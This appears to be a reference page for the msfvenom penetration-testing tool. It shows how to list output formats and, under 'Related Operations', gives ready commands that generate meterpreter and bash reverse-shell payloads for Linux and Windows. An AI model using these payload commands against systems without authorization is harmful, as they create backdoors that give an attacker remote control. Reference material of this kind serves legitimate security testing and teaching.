msfvenom
Verified for current stable LTS
Msfvenom Command: List Formats
Use for list formats with Msfvenom. Exact CLI syntax to list formats using Msfvenom.
When to use this: Use for list formats with Msfvenom.
Command Syntax
msfvenom -l formats msfvenom -l formats Command Breakdown
-l- Command Option
- Tool-specific option used by this command invocation.
FAQ
Purpose: Exact syntax to list formats using Msfvenom.
Test path: Replace placeholders and run destructive commands in a disposable workspace first.
Flag behavior: Tool version, platform, and shell can change behavior.
Improve This Command
Suggest a correction, safer default, or version-specific note for this entry.
Related Operations
Msfvenom Command: Create Elf Binary Reverse Tcp
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f elf -o <path/to/binary> Msfvenom Command: Create Exe Binary Reverse Tcp msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe -o <path/to/binary.exe> Msfvenom Command: Create Raw Bash Reverse Tcp msfvenom -p cmd/unix/reverse_bash LHOST=<local_ip> LPORT=<local_port> -f raw Msfvenom Command: List Payloads msfvenom -l payloads Msfvenom Command: Show Payload Options msfvenom -p <payload> --list-options